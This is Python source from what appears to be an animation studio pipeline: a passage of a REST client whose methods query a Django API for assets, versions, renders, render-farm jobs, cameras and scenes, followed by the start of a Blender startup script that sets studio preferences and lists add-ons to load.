if layers: query_strings.append("layers=%s" % layers)
if children: query_strings.append("children=%s" % children)
if movies: query_strings.append("movies=%s" % movies)
if renders: query_strings.append("renders=%s" % renders)
if show: query_strings.append("show=%s" % show)
if versions: query_strings.append("versions=%s" % versions)
if groups: query_strings.append("groups=%s" % groups)
if query_strings:
assets_url = "%s?%s" % (assets_url, "&".join(query_strings))
self.log.info("Getting: %s" %assets_url)
response = self.session.get(assets_url)
if response.status_code == 200:
assets = json.loads(response.text, object_hook = deserializers.decode_assets)
return assets
else:
self.log.info(assets_url)
self.log.info(response.reason, response.status_code)
self.log.info(response.text[0:100])
return None
#DJANGO APP: versions
def versions(
self,
versions_url = None,
version = None,
comment = None,
created = None,
asset = None,
):
if not versions_url:
versions_url = self.versions_url
query_strings = []
if version: query_strings.append("version=%s" % version)
if comment: query_strings.append("comment=%s" % comment)
if created: query_strings.append("created=%s" % created)
if asset: query_strings.append("asset=%s" % asset)
if query_strings:
versions_url = "%s?%s" % (versions_url, "&".join(query_strings))
self.log.info("Getting: %s" %versions_url)
response = self.session.get(versions_url)
if response.status_code == 200:
versions = json.loads(response.text, object_hook = deserializers.decode_versions)
return versions
else:
self.log.info(versions_url)
self.log.info(response.reason, response.status_code)
self.log.info(response.text[0:100])
return None
#DJANGO APP: movies
def movies(
self,
movies_url = None,
name = None,
filepath = None,
created = None,
modified = None,
asset = None,
):
if not movies_url:
movies_url = self.movies_url
query_strings = []
if name: query_strings.append("name=%s" % name)
if filepath: query_strings.append("filepath=%s" % filepath)
if created: query_strings.append("created=%s" % created)
if modified: query_strings.append("modified=%s" % modified)
if asset: query_strings.append("asset=%s" % asset)
if query_strings:
movies_url = "%s?%s" % (movies_url, "&".join(query_strings))
self.log.info("Getting: %s" %movies_url)
response = self.session.get(movies_url)
if response.status_code == 200:
movies = json.loads(response.text, object_hook = deserializers.decode_movies)
return movies
else:
self.log.info(movies_url)
self.log.info(response.reason, response.status_code)
self.log.info(response.text[0:100])
return None
#DJANGO APP: images
def images(
self,
images_url = None,
name = None,
filepath = None,
created = None,
modified = None,
assets = None,
):
if not images_url:
images_url = self.images_url
query_strings = []
if name: query_strings.append("name=%s" % name)
if filepath: query_strings.append("filepath=%s" % filepath)
if created: query_strings.append("created=%s" % created)
if modified: query_strings.append("modified=%s" % modified)
if assets: query_strings.append("assets=%s" % assets)
if query_strings:
images_url = "%s?%s" % (images_url, "&".join(query_strings))
self.log.info("Getting: %s" %images_url)
response = self.session.get(images_url)
if response.status_code == 200:
images = json.loads(response.text, object_hook = deserializers.decode_images)
return images
else:
self.log.info(images_url)
self.log.info(response.reason, response.status_code)
self.log.info(response.text[0:100])
return None
#DJANGO APP: companies
def companies(
self,
companies_url = None,
name = None,
project_root = None,
source_root = None,
render_root = None,
created = None,
modified = None,
shows = None,
):
if not companies_url:
companies_url = self.companies_url
query_strings = []
if name: query_strings.append("name=%s" % name)
if project_root: query_strings.append("project_root=%s" % project_root)
if source_root: query_strings.append("source_root=%s" % source_root)
if render_root: query_strings.append("render_root=%s" % render_root)
if created: query_strings.append("created=%s" % created)
if modified: query_strings.append("modified=%s" % modified)
if shows: query_strings.append("shows=%s" % shows)
if query_strings:
companies_url = "%s?%s" % (companies_url, "&".join(query_strings))
self.log.info("Getting: %s" %companies_url)
response = self.session.get(companies_url)
if response.status_code == 200:
companies = json.loads(response.text, object_hook = deserializers.decode_companies)
return companies
else:
self.log.info(companies_url)
self.log.info(response.reason, response.status_code)
self.log.info(response.text[0:100])
return None
#DJANGO APP: renders
def layer(
self,
layer_url = None,
name = None,
layer_type = None,
start = None,
end = None,
created = None,
modified = None,
jobs = None,
asset = None,
):
if not layer_url:
layer_url = self.layer_url
query_strings = []
if name: query_strings.append("name=%s" % name)
if layer_type: query_strings.append("layer_type=%s" % layer_type)
if start: query_strings.append("start=%s" % start)
if end: query_strings.append("end=%s" % end)
if created: query_strings.append("created=%s" % created)
if modified: query_strings.append("modified=%s" % modified)
if jobs: query_strings.append("jobs=%s" % jobs)
if asset: query_strings.append("asset=%s" % asset)
if query_strings:
layer_url = "%s?%s" % (layer_url, "&".join(query_strings))
self.log.info("Getting: %s" %layer_url)
response = self.session.get(layer_url)
if response.status_code == 200:
layer = json.loads(response.text, object_hook = deserializers.decode_layer)
return layer
else:
self.log.info(layer_url)
self.log.info(response.reason, response.status_code)
self.log.info(response.text[0:100])
return None
def render(
self,
render_url = None,
start = None,
end = None,
created = None,
modified = None,
jobs = None,
asset = None,
):
if not render_url:
render_url = self.render_url
query_strings = []
if start: query_strings.append("start=%s" % start)
if end: query_strings.append("end=%s" % end)
if created: query_strings.append("created=%s" % created)
if modified: query_strings.append("modified=%s" % modified)
if jobs: query_strings.append("jobs=%s" % jobs)
if asset: query_strings.append("asset=%s" % asset)
if query_strings:
render_url = "%s?%s" % (render_url, "&".join(query_strings))
self.log.info("Getting: %s" %render_url)
response = self.session.get(render_url)
if response.status_code == 200:
render = json.loads(response.text, object_hook = deserializers.decode_render)
return render
else:
self.log.info(render_url)
self.log.info(response.reason, response.status_code)
self.log.info(response.text[0:100])
return None
#DJANGO APP: renderfarm
def renderfarm(
self,
renderfarm_url = None,
job = None,
duration = None,
jobtask_total_time = None,
jobtask_average_time = None,
jobtask_total_time_norm = None,
jobtask_average_time_norm = None,
created = None,
modified = None,
render = None,
layer = None,
):
if not renderfarm_url:
renderfarm_url = self.renderfarm_url
query_strings = []
if job: query_strings.append("job=%s" % job)
if duration: query_strings.append("duration=%s" % duration)
if jobtask_total_time: query_strings.append("jobtask_total_time=%s" % jobtask_total_time)
if jobtask_average_time: query_strings.append("jobtask_average_time=%s" % jobtask_average_time)
if jobtask_total_time_norm: query_strings.append("jobtask_total_time_norm=%s" % jobtask_total_time_norm)
if jobtask_average_time_norm: query_strings.append("jobtask_average_time_norm=%s" % jobtask_average_time_norm)
if created: query_strings.append("created=%s" % created)
if modified: query_strings.append("modified=%s" % modified)
if render: query_strings.append("render=%s" % render)
if layer: query_strings.append("layer=%s" % layer)
if query_strings:
renderfarm_url = "%s?%s" % (renderfarm_url, "&".join(query_strings))
self.log.info("Getting: %s" %renderfarm_url)
response = self.session.get(renderfarm_url)
if response.status_code == 200:
renderfarm = json.loads(response.text, object_hook = deserializers.decode_renderfarm)
return renderfarm
else:
self.log.info(renderfarm_url)
self.log.info(response.reason, response.status_code)
self.log.info(response.text[0:100])
return None
#DJANGO APP: nodes
def action(
self,
action_url = None,
name = None,
):
if not action_url:
action_url = self.action_url
query_strings = []
if name: query_strings.append("name=%s" % name)
if query_strings:
action_url = "%s?%s" % (action_url, "&".join(query_strings))
self.log.info("Getting: %s" %action_url)
response = self.session.get(action_url)
if response.status_code == 200:
action = json.loads(response.text, object_hook = deserializers.decode_action)
return action
else:
self.log.info(action_url)
self.log.info(response.reason, response.status_code)
self.log.info(response.text[0:100])
return None
def camera(
self,
camera_url = None,
name = None,
clip_start = None,
clip_end = None,
camera_type = None,
focal_length = None,
sensor_width = None,
):
if not camera_url:
camera_url = self.camera_url
query_strings = []
if name: query_strings.append("name=%s" % name)
if clip_start: query_strings.append("clip_start=%s" % clip_start)
if clip_end: query_strings.append("clip_end=%s" % clip_end)
if camera_type: query_strings.append("camera_type=%s" % camera_type)
if focal_length: query_strings.append("focal_length=%s" % focal_length)
if sensor_width: query_strings.append("sensor_width=%s" % sensor_width)
if query_strings:
camera_url = "%s?%s" % (camera_url, "&".join(query_strings))
self.log.info("Getting: %s" %camera_url)
response = self.session.get(camera_url)
if response.status_code == 200:
camera = json.loads(response.text, object_hook = deserializers.decode_camera)
return camera
else:
self.log.info(camera_url)
self.log.info(response.reason, response.status_code)
self.log.info(response.text[0:100])
return None
def group(
self,
group_url = None,
name = None,
asset = None,
):
if not group_url:
group_url = self.group_url
query_strings = []
if name: query_strings.append("name=%s" % name)
if asset: query_strings.append("asset=%s" % asset)
if query_strings:
group_url = "%s?%s" % (group_url, "&".join(query_strings))
self.log.info("Getting: %s" %group_url)
response = self.session.get(group_url)
if response.status_code == 200:
group = json.loads(response.text, object_hook = deserializers.decode_group)
return group
else:
self.log.info(group_url)
self.log.info(response.reason, response.status_code)
self.log.info(response.text[0:100])
return None
def material(
self,
material_url = None,
name = None,
):
if not material_url:
material_url = self.material_url
query_strings = []
if name: query_strings.append("name=%s" % name)
if query_strings:
material_url = "%s?%s" % (material_url, "&".join(query_strings))
self.log.info("Getting: %s" %material_url)
response = self.session.get(material_url)
if response.status_code == 200:
material = json.loads(response.text, object_hook = deserializers.decode_material)
return material
else:
self.log.info(material_url)
self.log.info(response.reason, response.status_code)
self.log.info(response.text[0:100])
return None
def scene(
self,
scene_url = None,
name = None,
camera = None,
world = None,
frame_start = None,
frame_end = None,
frame_current = None,
):
if not scene_url:
scene_url = self.scene_url
query_strings = []
if name: query_strings.append("name=%s" % name)
if camera: query_strings.append("camera=%s" % camera)
if world: query_strings.append("world=%s" % world)
if frame_start: query_strings.append("frame_start=%s" % frame_start)
if frame_end: query_strings.append("frame_end=%s" % frame_end)
if frame_current: query_strings.append("frame_current=%s" % frame_current)
if query_strings:
scene_url = "%s?%s" % (scene_url, "&".join(query_strings))
self.log.info("Getting: %s" %scene_url)
response = self.session.get(scene_url)
if response.status_code == 200:
scene = json.loads(response.text, object_hook = deserializers.decode_scene)
return scene
else:
self.log.info(scene_url)
self.log.info(response.reason, response.status_code)
self.log.info(response.text[0:100])
return None
def world(
self,
world_url = None,
name = None,
):
if not world_url:
world_url = self.world_url
query_strings = []
if name: query_strings.append("name=%s" % name)
if query_strings:
world_url = "%s?%s" % (world_url, "&".join(query_strings))
self.log.info("Getting: %s" %world_url)
response = self.session.get(world_url)
if response.status_code == 200:
world = json.loads(response.text, object_hook = deserializers.decode_world)
return world
else:
self.log.info(world_url)
self.log.info(response.reason, response.status_code)
self.log.info(response.text[0:100])
return None
"""
Tangent Animation blender startup script. Sets parameters for the Studio
"""
__author__ = 'Jeff.Bell'
import bpy
from core.log import Log
# Initialize the log
log = Log()
log.info("Starting Tangent Animation pipeline configuration")
log.info("Setting some UI defaults")
bpy.data.use_autopack = False # Turn off auto-packing of images, etc
bpy.context.user_preferences.filepaths.use_relative_paths = False # Don't use relative paths
bpy.context.user_preferences.system.use_scripts_auto_execute = True # Auto-execute python scripts
bpy.context.user_preferences.system.use_scripts_auto_execute = True # Auto-execute python scripts
bpy.context.user_preferences.system.audio_sample_rate = "RATE_48000" # Default audio sampling rate
# Toggle system console off to prevent user from accidentally closing Blender
log.info("Toggling the system console")
bpy.ops.wm.console_toggle()
# Auto load some addons at startup
addon_startup_list = [
#"amaranth",
"animation_motion_trail",
"bone_selection_groups",
"dynamic_parent",
"mesh_summary_102",
"meshlint",
